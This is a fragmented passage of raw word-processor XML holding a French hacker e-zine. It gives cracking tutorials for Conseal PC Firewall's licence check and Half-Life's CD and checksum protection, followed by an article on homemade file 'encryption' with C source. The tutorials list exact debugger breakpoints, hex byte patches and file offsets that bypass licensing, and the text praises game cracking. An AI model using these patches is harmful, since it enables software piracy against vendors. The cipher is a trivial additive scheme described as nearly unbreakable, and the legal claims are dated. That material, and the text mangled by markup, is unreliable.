          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;suspect ?!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63   83C404                      add esp, 00000004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66   8845F0                       mov byte ptr [ebp-10], al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69   8A45F0                     mov al, byte ptr [ebp-10]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6C   A200EB4300            mov byte ptr [0043EB00], al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71   33C0                           xor eax, ea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73   A004EB4300             mov al, byte ptr [0043EB04]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78   85C0                           test eax, ea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7A   0F841C010000          je 0041149C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80   33C0                           xor eax, eax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82   A000EB4300              mov al, byte ptr [0043EB00]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87   85C0                            test eax, eax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11389   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>0F842A000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">           je 004113B9     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;intéressant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1138F   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>A1E4EA4300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">             mov eax, dword ptr [0043EAE4]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94   50                                 push eax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95   8B45F4                        mov eax, dword ptr [ebp-0C]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98   50                                 push eax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</w:rPr>
        <w:t xml:space="preserve">:00411399   E8354AFFFF              call 00405DD3      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;On arrive ici !!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="142" w:leader="none"/>
          <w:tab w:val="left" w:pos="71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1139E   83C408                        add esp, 00000008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ardez donc tout ça avec W32dasm. Vous verrez que le 2eme call sert seulement a afficher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 messages comme quoi la licence n'est pas bonne. Nous voyons un JE au dessus du CALL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bituellement, je n'attaque pas comme ceci mais comme il faut faire simple..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va forcer ce JE en le transformant en JMP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Il n'existe pas de JMP de la forme 0F!! mais celui qui le remplace est E9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ous avons donc une instruction en trop c'est pourquoi nous mettons 90 qui correspond a NOP c'est à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dire no operation. Nous recherchons donc avec notre éditeur hexadécimal :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0F842A000000A1E4EA4300 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>que nous modifions en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90E92A000000A1E4EA4300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n relance le programme et cela fonctionne ! miracle. Cependant quelques secondes après le menu,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rules se grise. Nous sortons la doc des apis Win32 (vous la trouverez sur crackstore) et nous voyon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quelle API fait cela.On trouve l'API : EnableMenuItem. Voyez le commentaire par vous mêmes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>The EnableMenuItem function enables, disables, or grays the given menu item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ça à l'air d'être cela qui s'est produit. Nous reprenons SoftIce et nous tapons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px enablemenuitem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uis nous relançons Conseal. L'api est utilisée plusieurs fois alors nous faisons F5 pour continuer jusqu'à voir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otre menu rules grisé. A l'arrivé nous trouvons ceci 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E0   33C0                       xor eax, ea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E2   8A45F8                  mov al, byte ptr [ebp-08]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E5   85C0                       test eax, ea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:004114E7   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>0F858D000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">       jne 0041157A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;ahahah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Possible Reference to String Resource ID=00001: "Description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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>|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:004114ED   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>6A01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                       push 00000001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Possible Ref to Menu: CONSEAL_FW, Item: "Change Ruleset File..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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>|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EF   68429C0000             push 00009C42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F4   A1E0EA4300           mov eax, dword ptr [0043EAE0]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F9   50                              push eax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* Reference To: USER32.EnableMenuItem, Ord:00B0h </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;notre API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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>|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4FA   FF1540874600          Call dword ptr [00468740]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* Possible Reference to String Resource ID=00001: "Description"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>|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:00411500   6A01                           push 00000001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* Possible Ref to Menu: CONSEAL_FW, Item: "Rules"  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;héhéhé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on ici aussi il n'y a rien de plus simple. Si les informations sont fausses le programme ne saute pas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et si elles sont bonnes, il saute et notre menu reste opérationnel.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Nous recherchons donc avec notre éditeur hexadécimal : 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0F858D0000006A01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>que nous modifions en:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="142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90E98D0000006A01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écidement ils aiment bien les 0F... Bon nous relançons ! bingo ça RuLeZ. Et maintenant que nous l'avons cracké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allons signer notre oeuvre avec un peu de reverse engineering. Dans la barre status, il y a marqué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irewall is up". Nous allons le changer en "HackerStorm". C'est pas bien difficile, nous prenons notre éditeur hexa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 nous recherchons cette string. C'est la deuxième. "la première servant dans le log". Vous écrivez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ckerStorm à la place et vous effacer les lettres en trop avec des espaces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reste encore quelquechose. Dans la fenêtre "about" il y a marqué :" licensed to : Trial User"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ependant là cette string se trouve dans la base de registre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KEY_LOCAL_MACHINE\\security\\Signal9\\FIREWALL\\1.3\\UserNam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suffit de mettre la valeur avec votre nom. Je vous expliquerai bien comment faire pour que cett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eur soit toujours la même quelque soit la base de registre mais cela va devenir trop difficil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omprendre et ce tut s'adresse aux débutants alors.... De plus cela n'a absolument aucune utilité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'est ici que s'achève ce tutorial sur Conseal Pc Firewall. Je suis certain que vous avez aussi envi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cracker des jeux, donc voici un petit extra : le crack de Half-Life 1.1.0.0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241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6 - Crack de Half-Life 1.1.0.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it crack en passant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 veux installer les bots pour counter strike. Malheureusement, il faut passer par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uvelle partie" dans half-life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 faisant cela : "Veuillez insérer le CD-ROM...", fait 3 fois d'affilé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ssique quoi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ne nous embêtons pas, nous prenons direct SOFTICE et nous plaçons un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px GetDiskFreeSpaceA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'est une api utilisée dans la détection des CD originaux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is nous lançons une partie. SI apparait. Nous traçons avec F10 jusqu'à l'apparition du message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sque le message apparaît, nous faisons Ok et nous nous retrouvons de nouveau sous softice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sommes sur un call en 0040EF69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69   E8F2D4FFFF              call 0040C46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la peut nous servir et nous permet de nous situer dans le proggy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 tracant un peu par des F12 et des F10, nous tombons la dessus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5B   46                             inc esi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5C   83FE03                    cmp esi, 00000003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5F   0F8CC9FEFFFF      jl 0040EF2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s quelques lignes de codes permettent de faire boucler le prog 3 fois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 pour vérifier s'il y a le CD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la le listing complet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Referenced by a (U)nconditional or (C)onditional Jump at Address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:0040F05F(C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2E   8B442414                mov eax, dword ptr [esp+14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32   50                             push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33   FFD7                       call edi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35   6A00                        push 0000000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37   6A02                        push 00000002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39   8D4C2424                lea ecx, dword ptr [esp+24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3D   E84E8F0400            call 00457E9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42   6854010000              push 00000154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47   C784246806000000000000       mov dword ptr [esp+00000668], 0000000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52   E809520500              call 0046416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57   8D4C2420                lea ecx, dword ptr [esp+20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5B 50                                push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5C 51                                push ec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5D   E8BE940400            call 0045842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62   83C40C                     add esp, 0000000C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65   8D4C241C                lea ecx, dword ptr [esp+1C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69   E8F2D4FFFF            call 0040C46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6E   83F801                      cmp eax, 00000001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71   0F85FA000000          jne 0040F071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:0040EF77   E8847DFFFF             call 00406D00          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;test la présence du cd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7C   85C0                           test eax,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0EF7E   0F85AF010000          jne 0040F133           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt; saut en cas de non égalité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84   A148CC4D00             mov eax, dword ptr [004DCC48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89   85C0                            test eax,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8B   7405                            je 0040EF92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8D   E87E52FFFF             call 0040421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Referenced by a (U)nconditional or (C)onditional Jump at Address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:0040EF8B(C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92   8B542418                        mov edx, dword ptr [esp+18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96   52                                    push ed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97   FFD7                              call edi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99   68D0070000                    push 000007D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9E   FFD3                               call eb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A0   C784246406000011000000  mov dword ptr [esp+00000664], 00000011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AB   8D8424B8030000          lea eax, dword ptr [esp+000003B8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B2   89AC24B8030000          mov dword ptr [esp+000003B8], ebp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B9   89442410                         mov dword ptr [esp+10],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BD   8D8C24B8030000          lea ecx, dword ptr [esp+000003B8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C4   C684246406000017        mov byte ptr [esp+00000664], 17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CC   E8B6A30800                  call 00499387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D1   8D8C24AC030000          lea ecx, dword ptr [esp+000003AC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D8   89AC24AC030000          mov dword ptr [esp+000003AC], ebp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DF   894C2410                        mov dword ptr [esp+10], ec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E3   8D8C24AC030000          lea ecx, dword ptr [esp+000003AC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EA   C684246406000018        mov byte ptr [esp+00000664], 18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F2   E890A30800                    call 00499387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F7   8D8C24A4030000           lea ecx, dword ptr [esp+000003A4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FFE   C684246406000014         mov byte ptr [esp+00000664], 14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06   E8076A0800                     call 00495A12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0B   8D8C24A4020000            lea ecx, dword ptr [esp+000002A4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12   C684246406000013           mov byte ptr [esp+00000664], 13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1A   E801E60200                     call 0043D62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1F   8D8C24B4010000             lea ecx, dword ptr [esp+000001B4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26   C684246406000012           mov byte ptr [esp+00000664], 12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2E   E8EDE50200                    call 0043D62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33   8D8C2484000000             lea ecx, dword ptr [esp+00000084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3A   C684246406000011         mov byte ptr [esp+00000664], 11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42   E8A9150300                     call 004405F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47   8D4C241C                         lea ecx, dword ptr [esp+1C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4B   C7842464060000FFFFFFFF    mov dword ptr [esp+00000664], FFFFFFFF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56   E805D6FFFF                    call 0040C66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:0040F05B   46                                       inc esi                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;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0F05C   83FE03                              cmp esi, 00000003     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt; boucle 3 fois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F05F   0F8CC9FEFFFF                jl 0040EF2E                &lt;&lt;&lt;&lt;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s même avant cela il y a un premier test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Referenced by a CALL at Address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|:0040F717   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D0   64A100000000            mov eax, dword ptr fs:[00000000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D6   6AFF                           push FFFFFFFF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D8   6853024A00                push 004A0253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DD   50                                push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DE   64892500000000          mov dword ptr fs:[00000000], esp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E5   81EC4C060000            sub esp, 0000064C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EB   53                                 push eb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EC   55                                 push ebp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ED   56                                 push esi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EE   57                                  push edi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0EEEF   E80C7EFFFF              call 00406D00    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;appel du test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0EEF4   85C0                             test eax,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:0040EEF6   0F85FB020000             jne 0040F1F7     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;saute si CD valid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trouvons cette partie de code grâce a la routine de vérification trouvée avant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 effet W32dasm donne l'endroit où ces routines sont appelées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notre patch, c'est très facile. Nous transformons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ne 0040F1F7     &lt;&lt;&lt;&lt;saute si OK         en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 0040F1F7      &lt;&lt;&lt;&lt;saute pour la condition invers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que ce saut ait lieu et que le CD soit considéré valide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ps: vous auriez sans doute voulu mettre un jmp, mais cela implique d'écraser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F par un nop (90) puis de mettre E9. Car il n'y a pas de jmp de la form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F .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it en hexa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F85FB020000 en 0F84FB020000    a l'offset EEF6h (cf barre des taches de W32dasm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ut pourrait aller pour le mieux mais non. Il y a une protection de forme checksum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alf-Life"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'éxecutable d'half-life a subit une modification..."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la comment est se qu'il nous accueil!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reprennons softice et nous plaçons ceci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px MessageBoxA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us relançons et il break. Un petit F12 et nous revoila dans HL.EXE en 0049A9E6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9A9D8   53                            push eb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9A9D9   57                            push edi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9A9DA   FF7508                  push [ebp+08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9A9DD   FF75F4                  push [ebp-0C]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Reference To: USER32.MessageBoxA, Ord:01BEh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ux autres petits F12 sous Softice pour remonter et voila ce que nous avons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:0042258B   7420                      je 004225AD    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;lorsque tout est OK, il fait un saute et continue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8D   6A00                    push 0000000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8F   6A30                     push 0000003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91   68D9010000          push 000001D9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96   E8C51B0400          call 0046416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9B   83C404                  add esp, 00000004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9E   50                           push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9F   E871840700           call 0049AA15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:004225A4   E8C7160000         call 00423C70   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;là il affiche l'erreur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A9   33C0                      xor eax, eax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:004225AB   EB05                     jmp 004225B2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¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤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 suffit donc de modifier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 004225AD       en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mp 004225AD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it en Hexa a l'offset 2258Bh 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420 en EB20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résumer : première solution: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set EEF7h : 84            (décimal: 61175 - 132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set 2258Bh : EB           (décimal: 140683 - 235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uxième solution plus convenable: (avec jmp, voir plus haut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set EEF6h : 90            (décimal: 61174 - 144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set EEF7h : E9            (décimal: 61175 - 233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set 2258Bh : EB           (décimal: 140683 - 235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raiment c'est pas très difficile. Je l'ai d'ailleurs cracké pour un pote qui ne m'en croyait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 capable ! héhé. Half-Life RuLeZ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: n'ayez pas peur de cracker des jeux, ce n'est pas plus compliqué :)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2: Half-Life est le meilleur jeu ! je vous le dis.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FIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1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'ai un petit message à passer : Mist va te faire enculer ! et emmène tout #crack.fr avec to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                                                      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CRYPTER ET CACHER SES DONNEES par KOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    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1 - Cryptage avec fichier cl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cryptage avec fichier clé est le plus répandu car le plus sûr. Tellement sûr que le gouvern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rançais a voté une loi qui interdit le cryptage avec une clé de plus de 128 bi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TTENTION: Ne pas confondre les bits et les octets car 1 octets = 8 bi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En france, une clé doit donc avoir au maximum 128/8= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> octets pour être légal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J'appelle clé toute donnée qui ne peut pas être retrouvé par calcul mathématiques comme d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asswords, des datas d'images,... Les équations de courbes, les codages progressif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1er octet +1, 2ème octet +2,  3ème octet +3,...), les datas échangées(1=204, 2=242, 3=16, 4=54, ...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nt à proscrire car trop simple à retrouver. Une fois une bonne clé trouvée, mettez la dans un fichi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ou en mémoire(nous prendrons la clé dans un fichier pour que l'explication soit plus facile à comprendre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ais comment fonctionne le cryptage avec fichier clé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'est très simple. Nous allons prendre un exemple. Vous avez le fichier "password.txt" à crypt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avez un fichier de 16 octets appellé "clé.dat". Vous lancez le programme de cryptage en spécifia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s 2 fichiers et le programme vous le crypte dans le fichier "crypté.dat". Qu'a-t'il fait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plus simple est de vous faire un schéma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TAS de "password.txt"       - 30 - 10 - 14 - 24 - 76 - 36 - 28 - 08 - 56 - 49 - 67 - 48 - 12 - 52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TAS de "clé.dat"                  - 10 - 45 - 84 - 65 - 28 - 98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cet exemple, "password.txt" fait 14 octets et "clé.dat" 6 octe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ors du lancement du programme, les datas de "clé.dat" sont ajouté à ceux de "password.txt" bytes à byt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orsque le fichier clé est fini, il revient au débu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TAS de "password.txt"       - 30 - 10 - 14 - 24 - 76 - 36 - 28 - 08 - 56 - 49 - 67 - 48 - 12 - 52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+  DATAS de "clé.dat" de la         - 10 - 45 - 84 - 65 - 28 - 98-|-10 - 45 - 84 - 65 - 28 - 98-|-10 - 45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ême taille que "password.txt" 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 = DATAS de "crypté.dat"            - 40 - 55 - 98 - 89 -104-134- 38 - 53 -140-114- 95 -146- 22 - 97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0 + 10  = 40, 10 + 45 = 55, 14 + 84 = 98,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pouvez donc remarquer que sans la clé exacte, le décryptage de "crypté.dat" est quasiment impossib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décrypter le fichier "crypté.dat", vous devrez soustraire(logique)  les datas de "clé.dat" à "crypté.dat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obtiendrez ainsi le fichier "password.txt" d'origin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   DATAS de "crypté.dat"            - 40 - 55 - 98 - 89 -104-134- 38 - 53 -140-114- 95 -146- 22 - 97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-  DATAS de "clé.dat" de la         - 10 - 45 - 84 - 65 - 28 - 98-|-10 - 45 - 84 - 65 - 28 - 98-|-10 - 45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ême taille que "crypté.dat"     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 = DATAS de "password.txt"       - 30 - 10 - 14 - 24 - 76 - 36 - 28 - 08 - 56 - 49 - 67 - 48 - 12 - 52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 xml:space="preserve">                       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voilà un cryptage avec fichier clé. Vous auriez très bien pu, au lieu de aditionner/soustraire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ustraire/aditionner, multiplier/diviser,diviser/multiplier,...ou encore combiner n'importe quel sor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 calcul mathématiques tant que vous pouviez retrouver l'original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2- Cryptage par b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cryptage par bit seul est moins répandu mais est très utilisé avec un cryptage avec fichier cl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s'agit de déplacer des bits(ou bloc de bits) de un ou plusieurs rangs vers la gauche ou la droi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1 1 0 1 0 1 1 0 -&gt; 1 0 1 0 1 1 0 1(1 déplacement vers la gauche),0 1 0 1 1 0 1 1(2 déplacement vers la gauche),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1 1 0 1 0 1 1 0 -&gt; 0 1 1 0 1 0 1 1(1 déplacement vers la droite),  1 0 1 1 0 1 0 1(2 déplacement vers la droite),..)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'inverser le bloc de bits(1 1 0 1 0 1 1 0 -&gt; 0 0 1 0 1 0 0 1)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'inverser des bits(1 1 0 1 0 1 1 0 -&gt; 1 0 0 0 0 0 1 1(inverser la 2ème,4ème,6ème,8ème) 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Exemple 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Nombre binaire -&gt; Nomb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0 0 0 0 0 0 0 0     -&gt; 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0 0 0 0 1 01 0      -&gt;  1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0 1 1 0 0 1 0 0     -&gt;  10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0 0 0 0 1 1 1 1     -&gt;  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1 0 0 1 0 1 1 0     -&gt;  15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1 1 1 1 1 1 1 1     -&gt;  25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Bit numéro:     0--------------------10-------------------20--------------------30-------------------40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Binaire :           0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1 1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auche(1) :     0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1 1 1 1 1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auche(2) :     0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1 1 1 1 1 0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auche(3) :     0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1 1 1 1 1 0 0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auche(4) :     0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1 1 1 1 1 0 0 0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auche(5) :     0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1 1 1 1 1 0 0 0 0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Droite(1) :       1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1 1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Droite(2) :       1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1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Droite(3) :       1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1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roite(4) :       1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0 1 1 1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Droite(5) :       1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 1 0 0 1 0 1 1 0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Inversé:           1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0 0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Gauche(1):     1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0 0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nversé + Gauche(2):     1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0 0 1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Gauche(3):     1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0 0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Gauche(4):     1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0 0 1 1 1 1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nversé + Gauche(5):     1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0 0 1 1 1 1 1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Droite(1):       0 1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0 0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Droite(2):       0 0 1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0 0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Droite(3):       0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0 0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Droite(4):       0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0 0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versé + Droite(5):       0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 1 1 0 0 1 1 0 1 1 1 1 1 1 0 0 0 0 0 1 1 0 1 0 0 1 0 0 0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nverser bits(paires):     0 1 0 1 0 1 0 1 0 1 0 1 1 1 1 1 0 0 1 1 0 0 0 1 0 1 0 1 1 0 1 0 1 1 0 0 0 0 1 1 1 0 1 0 1 0 1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nverser bits(paires)+Inversé + Gauche(5)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1 0 1 0 1 0 1 1 1 1 1 0 0 1 1 0 0 0 1 0 1 0 1 1 0 1 0 1 1 0 0 0 0 1 1 1 0 1 0 1 0 1 0 0 1 0 1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pouvez remarquer que se qui est au début est bien différent de la fi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le gouvernement français, ces déplacements de bits sont authorisés à l'infini tant qu'il ne fait appel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'a des calcules et non a des données extèrieures. Malheureusement, si vous voulez utiliser un cryptag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par bit légalement, vous devrez informer le gouvernement de toutes les démarches à faire pour décrypter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s données crypté avec votre méthode. Si vous utilisez un programme(même créé par vous), vous devrez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leur fournir. Le gouvernement doit pouvoir décrypter ou décoder toutes données aussi bi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ersonnelles ou privées à tout moment. Maistoutceci pour rester dans la légailté. ;o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 xml:space="preserve">      3 - Source d'un programme de cryptage avec fichier clé en C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>#include &lt;stdio.h&g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>#define MAX_CLE 128/8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main(int argc,char*argv[]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f(argc!=5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ntf("Usage : Crypt [fichier à crypter][operateur][fichier clé][fichier de sortie]\n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\toperateur : cela peut-être +, -, * ou /.\n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\t            exemple: pour crypter -&gt; Crypt texte.txt + cle.dat crypt.dat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\t                     et décrypter -&gt; Crypt texte.txt - cle.dat crypt.dat\n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Programme créé par KOP pour le groupe HackerStorm.\n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Pour plus d'informations,veuillez me contacter à HackerStorm@HotMail.com\n"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return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uts("Programme créé par KOP pour le groupe HackerStorm.\n\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our plus d'informations,veuillez me contacter à HackerStorm@HotMail.com"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f(argv[2][0]!='+'&amp;&amp;argv[2][0]!='-'&amp;&amp;argv[2][0]!='*'&amp;&amp;argv[2][0]!='/'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printf("L'opérateur %c n'est pas correct.\n",argv[2][0]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turn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ILE*crypte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f((crypter=fopen(argv[1],"rb"))==NULL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printf("Impossible de trouver le fichier à crypter \"%s\".\n\n",argv[1]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turn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ILE*cle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f((cle=fopen(argv[3],"rb"))==NULL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printf("Impossible de trouver le fichier clé \"%s\".\n\n",argv[2]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turn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ILE*sortie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ortie=fopen(argv[4],"wb"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unsigned char key,data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or(unsigned int i=0;;i++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i&gt;=MAX_CL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=0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fseek(cle,i,SEEK_SET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key=getc(cl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feof(cle)!=NULL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i=0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data=getc(crypter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feof(crypter)!=NULL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brea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argv[2][0]=='+'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putc(key+data,sorti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argv[2][0]=='-'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putc(data-key,sorti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argv[2][0]=='*'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putc(key*data,sorti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(argv[2][0]=='/'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putc(data/key,sorti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close(sorti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close(cl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close(crypter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ntf("Le fichier \"%s\" a été crypté avec la clé \"%s\"(%c)\nen \"%s\" avec succès.\n\n",argv[1],argv[3],argv[2][0],argv[4]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return 0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 programme doit être compilé avec un compilateur C/C++ sur n'importe quel O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ne devriez pas avoir de problème avec ce programme car il fait appel a stdio.h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i est disponible sur tous les compilateurs C/C++ de tous 